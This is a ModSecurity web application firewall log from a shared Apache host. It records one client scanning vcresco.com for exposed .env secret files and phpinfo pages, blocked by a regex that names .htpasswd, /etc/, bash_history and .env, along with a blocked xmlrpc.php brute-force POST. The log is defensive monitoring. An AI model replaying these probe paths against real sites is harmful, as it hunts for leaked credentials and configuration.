[Tue May 26 13:04:13.131699 2026] [security2:error] [pid 470766:tid 470956] [client 195.178.110.199:43326] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4F8AAAADw"]
[Tue May 26 13:04:13.167292 2026] [security2:error] [pid 470766:tid 470976] [client 195.178.110.199:43300] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4F9AAAAFA"]
[Tue May 26 13:04:13.179498 2026] [security2:error] [pid 470766:tid 470926] [client 195.178.110.199:43324] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4F9QAAAB4"]
[Tue May 26 13:04:13.188300 2026] [security2:error] [pid 470766:tid 471021] [client 195.178.110.199:43254] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/api-node/.env"] [unique_id "ahVM9ejO_W1DqEcFHQ4F_AAAAH0"]
[Tue May 26 13:04:13.242887 2026] [security2:error] [pid 470766:tid 470941] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4F_wAAAC0"]
[Tue May 26 13:04:13.256153 2026] [security2:error] [pid 470766:tid 470978] [client 195.178.110.199:43422] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GAAAAAFI"]
[Tue May 26 13:04:13.296011 2026] [security2:error] [pid 470766:tid 470995] [client 195.178.110.199:43408] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GBAAAAGM"]
[Tue May 26 13:04:13.353716 2026] [security2:error] [pid 470766:tid 470910] [client 195.178.110.199:43300] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GCAAAAA4"]
[Tue May 26 13:04:13.357558 2026] [security2:error] [pid 470766:tid 470967] [client 195.178.110.199:43324] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GCQAAAEc"]
[Tue May 26 13:04:13.368315 2026] [security2:error] [pid 470766:tid 470981] [client 195.178.110.199:43290] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GCgAAAFU"]
[Tue May 26 13:04:13.433297 2026] [security2:error] [pid 470766:tid 470907] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GEgAAAAs"]
[Tue May 26 13:04:13.434534 2026] [security2:error] [pid 470766:tid 470929] [client 195.178.110.199:43254] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/administrator/.env"] [unique_id "ahVM9ejO_W1DqEcFHQ4GFQAAACE"]
[Tue May 26 13:04:13.434769 2026] [security2:error] [pid 470766:tid 470965] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GEwAAAEU"]
[Tue May 26 13:04:13.448010 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:43374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/api/info.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GFwAAAFE"]
[Tue May 26 13:04:13.448517 2026] [security2:error] [pid 470766:tid 470904] [client 195.178.110.199:43314] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/api-backend/.env"] [unique_id "ahVM9ejO_W1DqEcFHQ4GFgAAAAg"]
[Tue May 26 13:04:13.457773 2026] [security2:error] [pid 470766:tid 470911] [client 195.178.110.199:43424] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GFAAAAA8"]
[Tue May 26 13:04:13.495566 2026] [security2:error] [pid 470766:tid 470902] [client 195.178.110.199:43332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/api/.env"] [unique_id "ahVM9ejO_W1DqEcFHQ4GHgAAAAY"]
[Tue May 26 13:04:13.524115 2026] [security2:error] [pid 470766:tid 470973] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GHQAAAE0"]
[Tue May 26 13:04:13.535038 2026] [security2:error] [pid 470766:tid 470901] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GIQAAAAU"]
[Tue May 26 13:04:13.610636 2026] [security2:error] [pid 470766:tid 470940] [client 195.178.110.199:43348] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GKQAAACw"]
[Tue May 26 13:04:13.621994 2026] [security2:error] [pid 470766:tid 470953] [client 195.178.110.199:43254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GKAAAADk"]
[Tue May 26 13:04:13.640089 2026] [security2:error] [pid 470766:tid 470962] [client 195.178.110.199:43422] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GKgAAAEI"]
[Tue May 26 13:04:13.651600 2026] [security2:error] [pid 470766:tid 470900] [client 195.178.110.199:43358] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GKwAAAAQ"]
[Tue May 26 13:04:13.714019 2026] [security2:error] [pid 470766:tid 470943] [client 195.178.110.199:43324] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GLwAAAC8"]
[Tue May 26 13:04:13.727590 2026] [security2:error] [pid 470766:tid 470983] [client 195.178.110.199:43352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GNAAAAFc"]
[Tue May 26 13:04:13.760101 2026] [security2:error] [pid 470766:tid 470922] [client 195.178.110.199:43348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/api/phpinfo.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GNwAAABo"]
[Tue May 26 13:04:13.819789 2026] [security2:error] [pid 470766:tid 471005] [client 195.178.110.199:43422] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GOAAAAG0"]
[Tue May 26 13:04:13.879647 2026] [security2:error] [pid 470766:tid 470976] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GPwAAAFA"]
[Tue May 26 13:04:13.959772 2026] [security2:error] [pid 470766:tid 470897] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GSgAAAAE"]
[Tue May 26 13:04:13.981906 2026] [security2:error] [pid 470766:tid 470992] [client 195.178.110.199:43290] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GSwAAAGA"]
[Tue May 26 13:04:14.009835 2026] [security2:error] [pid 470766:tid 470988] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GTgAAAFw"]
[Tue May 26 13:04:14.014104 2026] [security2:error] [pid 470766:tid 470935] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GUQAAACc"]
[Tue May 26 13:04:14.021227 2026] [security2:error] [pid 470766:tid 470942] [client 195.178.110.199:43358] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GUwAAAC4"]
[Tue May 26 13:04:14.024970 2026] [security2:error] [pid 470766:tid 470981] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4GVQAAAFU"]
[Tue May 26 13:04:14.035695 2026] [security2:error] [pid 470766:tid 470987] [client 195.178.110.199:43300] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/apis/.env"] [unique_id "ahVM9ujO_W1DqEcFHQ4GWQAAAFs"]
[Tue May 26 13:04:14.049956 2026] [core:crit] [pid 470766:tid 470977] (13)Permission denied: [client 40.77.167.2:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:04:14.194914 2026] [security2:error] [pid 470766:tid 471013] [client 195.178.110.199:43358] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ujO_W1DqEcFHQ4GZgAAAHU"]
[Tue May 26 13:04:14.214557 2026] [security2:error] [pid 470766:tid 471019] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ujO_W1DqEcFHQ4GaQAAAHs"]
[Tue May 26 13:04:14.222000 2026] [security2:error] [pid 470766:tid 470984] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ujO_W1DqEcFHQ4GbAAAAFg"]
[Tue May 26 13:04:14.255778 2026] [core:crit] [pid 470766:tid 470963] (13)Permission denied: [client 40.77.167.2:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:04:14.735706 2026] [security2:error] [pid 470766:tid 470929] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ujO_W1DqEcFHQ4GkAAAACE"]
[Tue May 26 13:04:14.985524 2026] [security2:error] [pid 470766:tid 470905] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ujO_W1DqEcFHQ4GmQAAAAk"]
[Tue May 26 13:04:14.992360 2026] [security2:error] [pid 470766:tid 470901] [client 195.178.110.199:43324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/app/.env"] [unique_id "ahVM9ujO_W1DqEcFHQ4GnQAAAAU"]
[Tue May 26 13:04:15.066475 2026] [security2:error] [pid 470766:tid 470974] [client 157.20.138.61:64011] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVM9-jO_W1DqEcFHQ4GogAAAE4"]
[Tue May 26 13:04:15.066616 2026] [security2:error] [pid 470766:tid 470974] [client 157.20.138.61:64011] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVM9-jO_W1DqEcFHQ4GogAAAE4"]
[Tue May 26 13:04:15.106166 2026] [security2:error] [pid 470766:tid 470920] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9-jO_W1DqEcFHQ4GpAAAABg"]
[Tue May 26 13:04:15.173165 2026] [security2:error] [pid 470766:tid 470954] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9-jO_W1DqEcFHQ4GrQAAADo"]
[Tue May 26 13:04:15.403494 2026] [security2:error] [pid 470766:tid 471008] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9-jO_W1DqEcFHQ4GugAAAHA"]
[Tue May 26 13:04:15.416479 2026] [security2:error] [pid 470766:tid 470944] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM9ujO_W1DqEcFHQ4GnAAAADA"]
[Tue May 26 13:04:15.585978 2026] [security2:error] [pid 470766:tid 470961] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9-jO_W1DqEcFHQ4GwAAAAEE"]
[Tue May 26 13:04:15.662822 2026] [security2:error] [pid 470766:tid 470930] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9-jO_W1DqEcFHQ4GzAAAACI"]
[Tue May 26 13:04:15.728736 2026] [security2:error] [pid 470766:tid 471000] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9-jO_W1DqEcFHQ4G0gAAAGg"]
[Tue May 26 13:04:15.870243 2026] [security2:error] [pid 470766:tid 470989] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9-jO_W1DqEcFHQ4G3wAAAF0"]
[Tue May 26 13:04:15.877303 2026] [security2:error] [pid 470766:tid 470985] [client 195.178.110.199:43420] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9-jO_W1DqEcFHQ4G4AAAAFk"]
[Tue May 26 13:04:15.926219 2026] [security2:error] [pid 470766:tid 470983] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9-jO_W1DqEcFHQ4G5QAAAFc"]
[Tue May 26 13:04:15.934506 2026] [security2:error] [pid 470766:tid 470950] [client 195.178.110.199:43422] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9-jO_W1DqEcFHQ4G5gAAADY"]
[Tue May 26 13:04:15.940289 2026] [security2:error] [pid 470766:tid 470979] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9-jO_W1DqEcFHQ4G5wAAAFM"]
[Tue May 26 13:04:15.951392 2026] [security2:error] [pid 470766:tid 470920] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9-jO_W1DqEcFHQ4G6gAAABg"]
[Tue May 26 13:04:15.998214 2026] [security2:error] [pid 470766:tid 470906] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9-jO_W1DqEcFHQ4G8gAAAAo"]
[Tue May 26 13:04:16.006764 2026] [security2:error] [pid 470766:tid 470899] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9-jO_W1DqEcFHQ4G8wAAAAM"]
[Tue May 26 13:04:16.081884 2026] [security2:error] [pid 470766:tid 471001] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4G-QAAAGk"]
[Tue May 26 13:04:16.112653 2026] [security2:error] [pid 470766:tid 470924] [client 195.178.110.199:43422] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4G_gAAABw"]
[Tue May 26 13:04:16.115635 2026] [security2:error] [pid 470766:tid 470909] [client 195.178.110.199:43326] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4G_wAAAA0"]
[Tue May 26 13:04:16.137477 2026] [security2:error] [pid 470766:tid 470931] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HAgAAACM"]
[Tue May 26 13:04:16.149152 2026] [security2:error] [pid 470766:tid 470992] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HCQAAAGA"]
[Tue May 26 13:04:16.149359 2026] [security2:error] [pid 470766:tid 470952] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HAAAAADg"]
[Tue May 26 13:04:16.176726 2026] [security2:error] [pid 470766:tid 470941] [client 195.178.110.199:43300] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-OjO_W1DqEcFHQ4HDQAAAC0"]
